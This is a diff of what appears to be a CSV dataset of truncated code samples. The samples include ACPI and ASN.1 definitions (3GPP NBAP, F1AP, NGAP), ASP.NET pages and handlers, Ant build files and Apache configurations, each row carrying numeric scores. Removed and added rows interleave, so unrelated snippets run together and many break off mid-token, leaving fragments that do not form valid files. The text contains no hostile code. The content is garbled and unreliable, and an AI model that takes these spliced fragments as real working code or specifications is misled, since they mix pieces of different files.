Checksum 0xA5 + * OEM ID ""SaSsdt"" + * OEM Table ID ""SaSsdt "" + * OEM Revision 0x00003000 (12288) + * Compiler ID ""INTL"" + * Compiler Version 0x20120913 (538052883) + */ +DefinitionBlock ("""", ""SSDT"", 2, ""SaSsdt"", ""SaSsdt "", 0x00003000) +{ + /* + * iASL Warning: There were 10 external control methods found during + * disassembly, but only 7 were resolved (3 unresolved). Additional + * ACPI tables may be required to properly disassemble the code. This + * resulting disassembler output file may not compile because the + * disassembler did n","87","0.44387755102040816","0.0","0.0" +"0c85a1f05e35afc1c8bc86475c4de69d964daff0","gen_trial_jobs_NEW.dsl",".dsl","ASL","import groovy.json.JsonSlurper + +//********************************************************************** +// Define constants +//********************************************************************** +def DAYS2KEEP = 30 +def NUM2KEEP = 100 +def TIMEOUT = 90 + +def NUM_DAYS = 11 + +//********************************************************************** +// Define parameters with default settings +//********************************************************************** +def ci_job_name_root = 'run-single-trial' +def fish = ""Harlene"" +def thatpistimulus = ""0"" +def pistimulus = ""0.png"" +def correctside = ""B"" +def day = ""1"" +def session = ""1"" +def feedside = ""both"" +def sex = ""female"" +def proportion = ""0"" +def species = ""gambusia"" +def fishstandardlength = ""TBD"" +def round = ""7"" +def camera = ""FALSE"" +def node = ""master"" +def cam_node = ""master"" +def which_node = ""master"" +def cwtime = ""3.8"" +def ccwtime = ""3.8"" +def copydelay = ""0"" + +//********************************************************************** +//Read in jso","87","0.44387755102040816","0.0","0.0" +"19e9ddc961e636fc09a73007953b4188b3f14c80","stylesheet.dsl",".dsl","ASL"," + + + + + + +]]> -BEGIN + +]]> -IMPORTS + +]]> + +]> + + + + + + + + + +(define draft-mode #f) + +(define pgsql-docs-list ""pgsql-docs@postgresql.org"") + +;; Don't show manpage volume numbers +(def","87","0.44387755102040816","0.0","0.0" +"14b93d2838270faa79a46071082bc7fcffb2a496","good7.asn",".asn","ASN.1","Seq-annot ::= { + desc { + region whole local str ""chr7"", + title ""Color by strand demonstration"", + name ""ColorByStrandDemo"", + user { + type str ""Track Data"", + data { + { + label str ""colorByStrand"", + data str ""255,0,0 0,0,255"" + }, + { + label str ""description"", + data str ""Color by strand demonstration"" + }, + { + label str ""name"", + data str ""ColorByStrandDemo"" + }, + { + label str ""visibility"", + data str ""2"" + } + } + }, + user { + type str ""NCBI_BED_COLUMN_COUNT"", + data { + { + label str ""NCBI_BED_COLUMN_COUNT"", + data int 6 + } + } + } + }, + data ftable { + { + id local id 1, + data region ""Pos1"", + location int { + from 127471196, + to 127472362, + strand plus, + id local str ""chr7"" + }, + exts { + { + type str ""DisplaySettings"", + ","59","1.0727272727272728","0.0","0.0" +"11eef720f3d729633386d1dbbf8b779d2b3c1c56","NBAP-PDU-Descriptions.asn",".asn","ASN.1","-- NBAP-PDU-Descriptions.asn +-- +-- Taken from 3GPP TS 25.433 V9.2.0 (2010-03) +-- http://www.3gpp.org/ftp/Specs/archive/25_series/25.433/ +-- +-- 9.3.2 Elementary Procedure Definitions +-- - HandoverToUTRANCommand, - MeasurementReport, - PhysicalChannelReconfiguration, - RadioBearerReconfiguration, - RadioBearerRelease, - RadioBearerSetup, - RRCConnectionSetupComplete-r3-add-ext-IEs, - RRC-FailureInfo, - TransportChannelReconfiguration, - UECapabilityInformation-r3-add-ext-IEs -FROM PDU-definitions - --- Core Network IEs : - CN-DomainIdentity, - CN-DomainInformationList, - CN-DomainInformationListFull, - CN-DRX-CycleLengthCoefficient, - NAS-SystemInformationGSM-MAP, --- UTRAN Mobility IEs : - CellIdentity, - URA-Identity, --- User Equipment IEs : - AccessStratumReleaseIndicator, - C-RNTI, - ChipRateCapability, - DL-CapabilityWithSimultaneousHS-DSCHConfig, - DL-PhysChCapabilityFDD-v380ext, - DL-PhysChCapabilityTDD, - DL-PhysChCapabilityTDD-LCR-r4, - GSM-Measurements, - HSDSCH-physical-layer-category, - FailureCauseWithProtErr, -","60","0.759493670886076","0.0","0.0" -"06d23e55d2889130fc4b39ba76cf106a96b7efc2","UMGSMMAP_T_BcsmCamelTDPData.asn",".asn","ASN.1","T-BcsmCamelTDPData ::= SEQUENCE { - t-BcsmTriggerDetectionPoint T-BcsmTriggerDetectionPoint, - serviceKey ServiceKey, - gsmSCF-Address [0] ISDN-AddressString, - defaultCallHandling [1] DefaultCallHandling, - extensionContainer [2] ExtensionContainer OPTIONAL, - ...} - -","60","0.759493670886076","0.0","0.0" -"00823779956751cbe0a52fc6ca7e0b63d6674134","F1AP-PDU-Contents.asn",".asn","ASN.1","-- 3GPP TS 38.473 V16.4.0 (2021-01) --- 9.4.4 PDU Definitions -- ************************************************************** -- --- PDU definitions for F1AP. +-- Elementary Procedure definitions -- -- ************************************************************** -F1AP-PDU-Contents { +NBAP-PDU-Descriptions { itu-t (0) identified-organization (4) etsi (0) mobileDomain (0) -ngran-access (22) modules (3) f1ap (3) version1 (1) f1ap-PDU-Contents (1) } +umts-Access (20) modules (3) nbap (2) version1 (1) nbap-PDU-Descriptions (0) } DEFINITIONS AUTOMATIC TAGS ::= @@ -2019,92 +1985,105 @@ BEGIN -- ************************************************************** IMPORTS - Candidate-SpCell-Item, - Cause, - Cells-Failed-to-be-Activated-List-Item, - Cells-Status-Item, - Cells-to-be-Activated-List-Item, - Cells-to-be-Deactivated-List-Item, - CellULConfigured, - CriticalityDiagnostics, - C-RNTI, - CUtoDURRCInformation, - DRB-Activity-Item, - DRBID, - DRBs-FailedToBeModified-Item, - DRBs-FailedToBeSetup-Item, - DRBs-FailedToBeSetupMod-Item, - DRB-Notify-Item, - ","60","0.759493670886076","0.0","0.0" -"1456e0f681304d312d694900af9b8d67b3db862a","UMGSMMAP_cug_Reject ERROR.asn",".asn","ASN.1","cug-Reject ERROR ::= { -PARAMETER Cug-RejectParam -CODE local:15 -} + Criticality, + ProcedureID, + MessageDiscriminator, + TransactionID +FROM NBAP-CommonDataTypes + + CommonTransportChannelSetupRequestFDD, + CommonTransportChannelSetupRequestTDD, + CommonTransportChannelSetupResponse, + CommonTransportChannelSetupFa","59","1.0727272727272728","0.0","0.0" +"0eeafe37921fd3d7e1390e3f8c1e3e55aa156039","JoystickCommand.asn",".asn","ASN.1","---------------------------------------------------------------- +--! ASN file generated automatically by the SARGON ASN.1 generator - +--! Date/time of generation: 2017/01/04 00:43:06 +---------------------------------------------------------------- +JoystickNamedCommand-Types DEFINITIONS ::= +BEGIN +IMPORTS T-Int32, T-UInt32, T-Int8, T-UInt8, T-Boolean FROM TASTE-BasicTypes +T-Int64, T-UInt16, T-Double, T-Float, T-UInt64, T-String FROM TASTE-ExtendedTypes +Time FROM Time-Types; -","60","0.759493670886076","0.0","0.0" -"06f02ba6dae77e50a64a9961cb3be5760fa7577d","005.asn1",".asn1","ASN.1","--RUN_SPARK -TEST-CASE DEFINITIONS AUTOMATIC TAGS::= BEGIN +-- String for name and axes +maxSize-JoystickString T-UInt32 ::= 25 +JoystickString ::= OCTET STRING (SIZE(0..maxSize-JoystickString)) - MyPDU ::= INTEGER(1..256,...,400..800) - - pdu1 MyPDU ::= 100 - - -END +-- Max. number of axes +axesElementsMax T-UInt32 ::= 30 ---TCLS MyPDU[] -","13","0.16455696202531644","0.0","0.0" -"047b4273a93e72d2e17060d23b93b9fb1096769e","UpperBounds.asn1",".asn1","ASN.1","UpperBounds -- {joint-iso-itu-t ds(5) module(1) upperBounds(10) 4} -DEFINITIONS ::= +-- Definition AXESVECTOR Starts +AxesVector ::= +SEQUENCE +{ + names SEQUENCE (SIZE(0..axesElementsMax)) OF JoystickString, + elements SEQUENCE (SIZE(0..axesElementsMax)) OF T-Double +} +-- Definition AXESVECTOR Ends + +-- Max. number of axes +buttonElementsMax T-UInt32 ::= 30 + +ButtonVector ::= +SEQUENCE +{ + names","59","1.0727272727272728","0.0","0.0" +"0c2ed0b1878cb4796c50acc13138b01db9aaa24e","X841.asn",".asn","ASN.1","-- Module SIOsAccessControl-MODULE (X.841:10/2000) +-- See also ITU-T X.841 (10/2000) +-- See also the index of all ASN.1 assignments needed in this document + +SIOsAccessControl-MODULE {joint-iso-itu-t sios(24) specification(0) modules(0) + accessControl(0)} DEFINITIONS IMPLICIT TAGS ::= +BEGIN + +-- EXPORTS All; +IMPORTS + id-at-clearance + FROM EnhancedSecurity {joint-iso-itu-t ds(5) module(1) enhancedSecurity(28) + 1} -- ITU-T Rec. X.501 | ISO/IEC 9594-2 + ATTRIBUTE, Name + FROM InformationFramework {joint-iso-itu-t ds(5) module(1) + informationFramework(1) 3} -- ITU-T Rec. X.501 | ISO/IEC 9594-2 + Extensions + FROM AuthenticationFramework {joint-iso-itu-t ds(5) module(1) + authenticationFramework(7) 3} -- ITU-T Rec. X.509 | ISO/IEC 9594-8 + DirectoryString{} + FROM SelectedAttributeTypes {joint-iso-itu-t ds(5) module(1) + selectedAttributeTypes(5) 3}; -- ITU-T Rec. X.520 | ISO/IEC 9594-6 + +id-ConfidentialityLabel OBJECT IDENTIFIER ::= + {joint-iso-itu-t sios(24","59","1.0727272727272728","0.0","0.0" +"0ce1acba606d30bdf5503bd70972ddd298f5334e","systemConfigH324m.asn",".asn","ASN.1","3G-324M-SYSTEM-CONFIGURATION ::= BEGIN --- EXPORTS All -- --- The types and values defined in this module are exported for use in the other ASN.1 modules contained --- within the Directory Specifications, and for the use of other applications which will use them to access --- Directory services. Other applications may use them for their own purposes, but this will not constrain --- extensions and modifications needed to maintain or improve the Directory service. - -ub-answerback INTEGER ::= 8 -ub-business-category INTEGER ::= 128 -ub-common-name INTEGER ::= 64 -ub-content INTEGER ::= 32768 -ub-country-code INTEGER ::= 4 -ub-description INTEGER ::= 1024 -ub-destination-indicator INTEGER ::= 128 -ub-directory-string-first-component-match INTEGER ::= 32768 -ub-domainLocalID INTEGER ::= 64 -ub-international-isdn-number INTEGER ::= 16 -ub-knowledge-information INTEGER ::= 32768 -ub-localeContextS","13","0.16455696202531644","0.0","0.0" -"15e2cacedb8eabd0dc2d5ef76b87ab9e05b19390","LogicalDevice.asn1",".asn1","ASN.1","--! ---! Copyright (C) 2017-2019 N7 Space sp. z o. o. ---! Contact: http://n7space.com ---! ---! This file is part of ASN.1/ACN PUS-C Components Library. ---! ---! Library was developed under a programme and funded by ---! European Space Agency. ---! ---! This Library is free software: you can redistribute it and/or modify ---! it under the terms of the GNU General Public License as published by ---! the Free Software Foundation, either version 3 of the License, or ---! (at your option) any later version. ---! ---! This Library is distributed in the hope that it will be useful, ---! but WITHOUT ANY WARRANTY; without even the implied warranty of ---! MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ---! GNU General Public License for more details. ---! ---! You should have received a copy of the GNU General Public License ---! along with this program. If not, see . ---! - -LogicalDevice DEFINITIONS AUTOMATIC TAGS ::= BEGIN -EXPORTS ALL; - -LogicalDevice-ID ::= ENUMERAT","13","0.16455696202531644","0.0","0.0" +-- This ASN.1 file contains the settings of the main 3G-324m stack's configuration (system tree) + + + + +-- *********************************************************************************************** +-- +-- 3G-324m Main stack configuration +-- The SYSTEM tree +-- +-- *********************************************************************************************** + +3G324mConfiguration ::= SEQUENCE +{ + maxCalls INTEGER(1..2147483647), + -- The maximum number of concurrent calls allowed. + + maxTransmittingChannels INTEGER(0..30), + -- Number of transmitting media channels available per call. + + maxReceivingChannels INTEGER(0..30), + -- Number of receiving media channels available per call. + + allocations SEQUENCE + { + totalPvtNodes INTEGER(0.","59","1.0727272727272728","0.0","0.0" "0d6a21297c436e561b91aadbb658cd6045bd0761","test.asn1",".asn1","ASN.1","-- $Id$ -- TEST DEFINITIONS ::= @@ -2151,638 +2130,767 @@ TESTImplicit ::= SEQUENCE { ti3[2] IMPLICIT [5] IMPLICIT [4] IMPLICIT INTEGER (-2147483648..2147483647) } -TESTImplicit2 ::= SEQUEN","13","0.16455696202531644","0.0","0.0" -"03ad6a420cdfd2fdadbc8f0c5bf05debd40925ca","d2dconnectionrelease.asn1",".asn1","ASN.1","EUTRA-RRC-Definitions DEFINITIONS AUTOMATIC TAGS ::= +TESTImplicit2 ::= SEQUEN","16","0.2909090909090909","0.0","0.0" +"0f247f0227e644ad9a2d886fb7cdc68f98a2c3a3","NGAP-PDU-Descriptions.asn1",".asn1","ASN.1","-- ************************************************************** +-- +-- Elementary Procedure definitions +-- +-- ************************************************************** + +NGAP-PDU-Descriptions { +itu-t (0) identified-organization (4) etsi (0) mobileDomain (0) +ngran-Access (22) modules (3) ngap (1) version1 (1) ngap-PDU-Descriptions (0)} + +DEFINITIONS AUTOMATIC TAGS ::= BEGIN -RRCConnectionRelease::= SEQUENCE { - - ue-Identity INTEGER(0..maxUeId), - releaseCause ENUMERATED {normal, other} -} - -maxUeId INTEGER ::= 8 - -END - -","13","0.16455696202531644","0.0","0.0" -"055302c8e9007a3a74d1e2fda06d75315e8ffd4d","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""ClassManagment.MvcApplication"" Language=""C#"" %> -","1106","0.11887360275150473","0.0","0.0" -"1ca3206e4c24d5993c0ade77b60ffa10eea2708e","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""Marcos.EstudoTddDdd.Web.MvcApplication"" Language=""C#"" %> -","1106","0.11887360275150473","0.0","0.0" -"09767ce591e7a7d81421f849f77caabcca27fdd3","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""AdDataProject.WebApiApplication"" Language=""C#"" %> -","1106","0.11887360275150473","0.0","0.0" -"007f3c8794966b3471431249471819af881fece4","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""BooksStorage.Global"" Language=""C#"" %> -","1106","0.11887360275150473","0.0","0.0" -"0534f4d766e3ed208b9d9d171293098cc2a0cbe0","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""BellumGens.Api.WebApiApplication"" Language=""C#"" %> -","1106","0.11887360275150473","0.0","0.0" -"187a41280c7195dfeeed37e0023463b7e167406b","HR_TimeLogs.ascx",".ascx","ASP.NET","<%@ Control Language=""C#"" AutoEventWireup=""true"" CodeFile=""HR_TimeLogs.ascx.cs"" Inherits=""DynamicData_QuickAdd_HR_TimeLogs"" %> -
- -
","1150","0.12360275150472914","0.0","0.0" -"0d9d4c6d2d2ac94d98759650c00fe063c0347668","UpdateRequest.ascx",".ascx","ASP.NET","<%@ Control Language=""C#"" AutoEventWireup=""true"" CodeBehind=""UpdateRequest.ascx.cs"" Inherits=""EHR.Recruitment.UpdateRequest"" %> - -
- - - - - - - ","1150","0.12360275150472914","0.0","0.0" -"14d44354950d9410deb4a485b3be15e93b9e785c","MyJobs.ascx",".ascx","ASP.NET","<%@ Control Language=""C#"" CodeFile=""MyJobs.ascx.cs"" Inherits=""MyJobs_ascx"" %> - - - - - - - - - -
- -<%@ Register TagPrefix=""jenzabar"" assembly=""Jenzabar.Common"" namespace=""Jenzabar.Common.Web.UI.Controls"" %> -<%@ Import namespace=""Jenzabar.ICS.Web.Portlets.BookmarkPortlet"" %> -<%@ Import namespace=""Jenzabar.Common.Globalization"" %> -<%@ Register TagPrefix=""web"" Assembly=""Jenzabar.Portal.Framework.Web"" Namespace=""Jenzabar.Portal.Framework.Web.UI.Controls"" %> -
- - - <%# DataBinder.Eval( Container.DataItem, ""Name"" )%> - - - <%# DataBinder.Eval( Container.DataItem, ""Description"" )%> - - - "" %> - - -
-

  EHR - Recruitment Form

- 		- Request Form ID : - - - Request Date: -
+ + + + + + +
+ <%=Language.Instance[""LocalLink"", null, ""Local link: ""] %> + + + +
+ <%=Language.Instance[""URLToLink"", null, ""URL to link: ""] %> + + ","1131","0.12149532710280374","0.0","0.0" +"0fcd4712e11ca8c12b27f409b5ac025d76e36583","GetaMarksbyBound.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" CodeBehind=""GetaMarksbyBound.ashx.cs"" Class=""Policesystem.Handle.GetaMarksbyBound"" %> +","228","0.024492426683854335","0.0","0.0" +"0ae2c52060a20aeeef47613cb640830a3dd38ace","MainHandler.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" Class=""MainHandler"" %> + +using System; +using System.Web; +using ECI.DOUBLEE.BLL.DbElevent; +using ECI.DOUBLEE.Entity.Entity; +using System.Collections.Generic; +using ECI.DOUBLEE.Entity.ViewModel; + - FileInfo songFileInfo = new FileInfo(songFilePath); - if (!songFileInfo.Exists) +public class MainHandler : IHttpHandler { + DB_ELEVEN_MAIN_BLL bll = new DB_ELEVEN_MAIN_BLL(); + public void ProcessRequest (HttpContext context) { + context.Response.ContentType = ""text/plain""; + string action = context.Request[""action""]; + switch (action) { - this.Response.StatusCode = 404; - this.Response.ContentType = ""text/html""; - this.Response.Write(string.Format(""Song file \""{0}\"" was not found."", songFileInfo.FullName)); - ","233","0.02504299226139295","0.0","0.0" -"00317344b146660762ff654929ca9a27e9ebc278","PopesService.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""PopesService.asmx.cs"" Class=""Exercise1___PopesService.PopesService"" %> -","114","0.012252794496990542","0.0","0.0" + case ""pushCharts"": + PushCharts(); + break; + case ""backCharts"": + BackCharts(); + break; + case ""ESBMonitoring"": + ESBMonitoring(); + break; + case ""avgPushList"": + AvgPushList(); + break; + case ""avgImport"": + AvgImport(); + break; + case ""getAvgSend"": + GetAvgSend();","228","0.024492426683854335","0.0","0.0" +"0c007021dc4213c8f73c061f531f6d0ed1135b19","FriendsRequest.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" Class=""FriendsRequest"" %> + +using System; +using System.Web; + +public class FriendsRequest : ServerResponse { + + protected override void Respond(HttpContext context) + { + MyDatabase mydb = new MyDatabase(); + + mydb.newQuery( + ""INSERT INTO [FriendRequests] ([sender_id], [receiver_id], [status], [send_date]) "" + + ""VALUES (@userid, @friendid, 'pending', GETDATE())"" + ); + mydb.setParameter(""userid"", context.Session[""user_id""].ToString()); + mydb.setParameter(""friendid"", context.Request[""friendId""].ToString()); + + mydb.ExecuteNonQuery(); + + } +}","228","0.024492426683854335","0.0","0.0" +"07606a8a588a4141c4582be03ce70bb601d0dd9b","fileDownload.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" CodeBehind=""fileDownload.ashx.cs"" Class=""DigitalCampus.Web.Upload.fileDownload"" %> +","228","0.024492426683854335","0.0","0.0" +"035649be46ae0bdb8011bc28bf26188fbcb1405c","DemoPrintFileWithEncryptionHandler.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""VB"" Class=""DemoPrintFileWithEncryptionHandler"" %> + +Imports System +Imports System.Web + +Imports Neodynamic.SDK.Web + +Public Class DemoPrintFileWithEncryptionHandler : Implements IHttpHandler + + + '############### IMPORTANT!!! ############ + ' If your website requires AUTHENTICATION, then you MUST configure THIS Handler file + ' to be ANONYMOUS access allowed!!! + '######################################### + + + Public Sub ProcessRequest(ByVal context As HttpContext) Implements IHttpHandler.ProcessRequest + + If WebClientPrint.ProcessPrintJob(context.Request.Url.Query) Then + Dim useDefaultPrinter As Boolean = (context.Request(""useDefaultPrinter"") = ""checked"") + Dim printerName As String = context.Server.UrlDecode(context.Request(""printerName"")) + + Dim fileType As String = context.Request(""filetype"") + + Dim fileName As String = (Guid.NewGuid().ToString(""N"") & ""."") + fileType + ","228","0.024492426683854335","0.0","0.0" +"044c510ca4f27fc10adc6befed625f26f7d9e669","SVAN_NFeRetRecepcao2.asmx",".asmx","ASP.NET"," + + + + + + + + + + + + +","111","0.011923944569771189","0.0","0.0" "1c6bf932209411aec15ebefd76bd9d68b5835850","WorkFlowDeputize.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""~/App_Code/WorkFlowDeputize.cs"" Class=""WorkFlowDeputize"" %> -","114","0.012252794496990542","0.0","0.0" -"006032f265015a39ca3f8da87a302dc52a203c5e","v_my_deletable_todoWS_Base.asmx",".asmx","ASP.NET","<%@ WebService Language=""vb"" Codebehind=""v_my_deletable_todoWS_Base.asmx.vb"" Class=""autotask.web.services.v_my_deletable_todoWS_Base"" %>","114","0.012252794496990542","0.0","0.0" -"18b537f37b9a143ab1dbe8ead61cdd5cb56c8ec4","WebService1.asmx",".asmx","ASP.NET","<%@ WebService Language=""vb"" CodeBehind=""WebService1.asmx.vb"" Class=""ServicioWeb.WebService1"" %> -","114","0.012252794496990542","0.0","0.0" -"044bac16eb4fc712e2fada8e04a9cac1779b2807","InventoryCheck.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""InventoryCheck.asmx.cs"" Class=""Inventory.InventoryCheck"" %> -","114","0.012252794496990542","0.0","0.0" -"005dd68f10dd8c2e328d5aa96866779e2e654994","Backup.aspx",".aspx","ASP.NET","<%@ <%@ Page Language=""vb"" AutoEventWireup=""true"" CodeBehind=""Backup.aspx.vb"" Inherits=""MySqlBackupWebSample.Backup"" %> +","111","0.011923944569771189","0.0","0.0" +"068b90fd406b3e9c715834d09e8c29f368747e87","Drug.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""~/App_Code/Drug.cs"" Class=""Drug"" %> +","111","0.011923944569771189","0.0","0.0" +"01497abd88f5278101ac162aef4cb75712ff8e38","WebService2.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""WebService2.asmx.cs"" Class=""MedicalCare.WebService2"" %> +","111","0.011923944569771189","0.0","0.0" +"08ac16c77e1838d438f4ba4e79efbfb651d4d438","MembersPicture.aspx",".aspx","ASP.NET","<%@ Page Language=""C#"" AutoEventWireup=""true"" CodeFile=""MembersPicture.aspx.cs"" Inherits=""MembersPicture"" %> - + - - - MySqlBackup.NET - - - - -
-
-
-
-

- Demo (Basic Implementation) of Using MySqlBackup With ASP.NET C#

-
- -
- - - ","6728","0.7231298366294067","0.0","0.0" -"13e57d971310e8424f8eec1b21dcdad64061f46b","TableInfo_Export.aspx",".aspx","ASP.NET","<%@ Page Language=""C#"" AutoEventWireup=""true"" CodeBehind=""TableInfo_Export.aspx.cs"" Inherits=""eFrameWork.Manage.TableInfo_Export"" %> + + + + - - - - + + About - Social Advice Website Template + + + + + - -","6728","0.7231298366294067","0.0","0.0" -"148e034d63fc262ee22ca8ea012b4b51b5baf34d","directions.aspx",".aspx","ASP.NET","<%@ Page Language=""C#"" MasterPageFile=""~/project/MasterPage.master"" AutoEventWireup=""true"" %> -<%@ Import Namespace=""System.Web"" %> -<%@ Import Namespace=""System.IO"" %> -<%@ Import Namespace=""System.Net"" %> -<%@ Import Namespace=""edu.neu.ccis.rasala"" %> - - - - - - - - - - - - + - + + + + + + + + + + - - - - + + + + + + + + + + + - - - - + + + + + + - - + - - - - - ","3508","0.9853932584269663","0.0","0.0" -"1867b8c23fa168570b604f472c8abe86ff7298c5","build.xml",".xml","Ant Build System"," - - - - - - - - - - Builds, tests, and runs the project VoteBem. + + + + + + + + + + +","3463","0.9592797783933518","0.0","0.0" +"08603f91be03edea5a85ff69f45bed0e21ceec29","build.xml",".xml","Ant Build System"," + Builds, tests, and runs the project Hangman. + + + + + + Listen 443 + + + Listen 443 + + + + Options FollowSymLinks + AllowOverride None + Require all denied + - - + + AllowOverride All + Require all granted + + +DocumentRoot /var/www/html -","3508","0.9853932584269663","0.0","0.0" -"0e52848e5813f7cae5220c06249e6f20cd8611b4","000-default.conf",".conf","ApacheConf"," +AccessFileName .htaccess + + Require all denied + + +LogFormat ""%v:%p %h %l %u %t \""%r\"" %>s %O \""%{Referer}i\"" \""%{User-Agent}i\"""" vhost_combined +LogFormat ""%h %l %u %t \""%r\"" %>s %O \""%{Referer}i\"" \""%{User-Agent}i\"""" combined +LogFormat ""%h %l %u %t \""%r\"" %>s %O"" common +LogFormat ""%{Referer}i -> %U"" referer +LogFormat ""%{User-agent}i"" agent + +CustomLog /proc/self/fd/1 ","106","0.08191653786707882","0.0","0.0" +"0fdc93d55759f767e95072d01f086d2476bbac35","000-default.conf",".conf","ApacheConf"," # The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName @@ -4385,379 +4807,281 @@ node { # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. - ServerName dlite.dev + #ServerName www.example.com - ServerAdmin admin@dlite.dev - - DocumentRoot /home/web/index/public + ServerAdmin webmaster@localhost + DocumentRoot /var/www/html # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn - LogLevel warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are - # enabled or d","83","0.06311787072243347","0.0","0.0" -"00d518074812c094d62f7d5cb1b5d1a1222c928c","httpd.conf",".conf","ApacheConf","s/^#ServerName www.example.com:80/ServerName 127.0.0.1:80/ -s/^#LoadModule proxy_module modules\/mod_proxy.so/LoadModule proxy_module modules\/mod_proxy.so/ -s/^#LoadModule proxy_fcgi_module modules\/mod_proxy_fcgi.so/LoadModule proxy_fcgi_module modules\/mod_proxy_fcgi.so/ -s/^#LoadModule rewrite_module modules\/mod_rewrite.so/LoadModule rewrite_module modules\/mod_rewrite.so/ -/^Include conf\/extra\/php-fpm.conf/d -/^Include conf\/extra\/httpd-default.conf/ a\Include conf\/extra\/php-fpm.conf","83","0.06311787072243347","0.0","0.0" -"00aa66836d7d365df089ad6d1323bc96436255f4","vhost-ks.conf",".conf","ApacheConf","# -# MacOS: -# /etc/apache2/users/ks.conf -# -NameVirtualHost *:80 + # enabled or disabled at a g","106","0.08191653786707882","0.0","0.0" +"06c412c328bc541af9fa6eebf16150b78618d6ba","apache2.conf",".conf","ApacheConf","# This is the main Apache server configuration file. It contains the +# configuration directives that give the server its instructions. +# See http://httpd.apache.org/docs/2.4/ for detailed information about +# the directives and /usr/share/doc/apache2/README.Debian about Debian specific +# hints. +# +# +# Summary of how the Apache 2 configuration works in Debian: +# The Apache 2 web server configuration in Debian is quite different to +# upstream's suggested way to configure the web server. This is because Debian's +# default Apache2 installation attempts to make adding and removing modules, +# virtual hosts, and extra configuration directives as flexible as possible, in +# order to make automating the changes and administering the server as easy as +# possible. + +# It is split into several files forming the configuration hierarchy outlined +# below, all located in the /etc/apache2/ directory: +# +# /etc/apache2/ +# |-- apache2.conf +# | `-- ports.conf +# |-- mods-enabled +# | |-- *.load +# | `-- *.conf +","106","0.08191653786707882","0.0","0.0" +"01e315ac2943aa5c74a527d19b93d8d0b3ea6998","org-ids-redirect.conf",".conf","ApacheConf","# vi: ft=apache - ServerName localhost - - DocumentRoot ""/work/mv-kickstart"" - - - Options +Indexes - IndexOptions -FancyIndexing +FoldersFirst +IgnoreClient +SuppressColumnSorting +ShowForbidden - - AllowOverride All - Order allow,deny - Allow from all - - + ServerName www.org-id.guide + Redirect / http://org-id.guide/ +","106","0.08191653786707882","0.0","0.0" +"08cdae682cb64f2b030598d91c2df7b2b8b17f7b","httpd.conf",".conf","ApacheConf","# +# This is the main Apache HTTP server configuration file. It contains the +# configuration directives that give the server its instructions. +# See for detailed information. +# In particular, see +# +# for a discussion of each configuration directive. +# +# Do NOT simply read the instructions in here without understanding +# what they do. They're here only as hints or reminders. If you are unsure +# consult the online docs. You have been warned. +# +# Configuration and logfile names: If the filenames you specify for many +# of the server's control files begin with ""/"" (or ""drive:/"" for Win32), the +# server will use that explicit path. If the filenames do *not* begin +# with ""/"", the value of ServerRoot is prepended -- so ""logs/access_log"" +# with ServerRoot set to ""/usr/local/apache2"" will be interpreted by the +# server as ""/usr/local/apache2/logs/access_log"", whereas ""/logs/access_log"" +# wil","106","0.08191653786707882","0.0","0.0" +"07abd167995d8ff6228867174828adbec3a3a325",".htaccess",".htaccess","ApacheConf","Options FollowSymLinks +AddDefaultCharset utf-8 -# vim:ft=apache: - - -","83","0.06311787072243347","0.0","0.0" -"03a3cff89826e36a98b7fe198efc840f9bf88587","httpd.conf",".conf","ApacheConf","# -# This is the main Apache HTTP server configuration file. It contains the -# configuration directives that give the server its instructions. -# See for detailed information. -# In particular, see -# -# for a discussion of each configuration directive. -# -# Do NOT simply read the instructions in here without understanding -# what they do. They're here only as hints or reminders. If you are unsure -# consult the online docs. You have been warned. -# -# Configuration and logfile names: If the filenames you specify for many -# of the server's control files begin with ""/"" (or ""drive:/"" for Win32), the -# server will use that explicit path. If the filenames do *not* begin -# with ""/"", the value of ServerRoot is prepended -- so ""logs/access_log"" -# with ServerRoot set to ""/usr/local/apache2"" will be interpreted by the -# server as ""/usr/local/apache2/logs/access_log"", whereas ""/logs/a","83","0.06311787072243347","0.0","0.0" -"034d3b5dcde18da783a6295068808cec169cb995","httpd.conf",".conf","ApacheConf"," - - Header set Cache-Control ""no-cache, no-store, no-transform"" - - -","83","0.06311787072243347","0.0","0.0" -"0086a6f7f16d89ddfbe949dea7eb1f5f84bf195f",".htaccess",".htaccess","ApacheConf"," -RewriteEngine on -RewriteCond %{REQUEST_FILENAME} !-f -RewriteCond %{REQUEST_FILENAME} !-d -RewriteRule ^(.*)$ index.php -php_value default_charset UTF-8 -AddType 'text/html; charset=utf-8' .html .htm .shtml -","1256","0.9551330798479087","0.0","0.0" -"03b7b3f79c0bd99fcb10c96b5bf59e35c37f67b7",".htaccess",".htaccess","ApacheConf","# RewriteEngine On - -# RewriteBase /idcoffice/user/ -# RewriteCond %{THE_REQUEST} ^[A-Z]{3,}\s([^.]+)\.php [NC] -# RewriteRule ^ %1 [R=301,L] -# RewriteCond %{REQUEST_FILENAME} !-d -# RewriteCond %{REQUEST_FILENAME}.php -f -# RewriteRule ^(.*?)/?$ $1.php [NC,L] 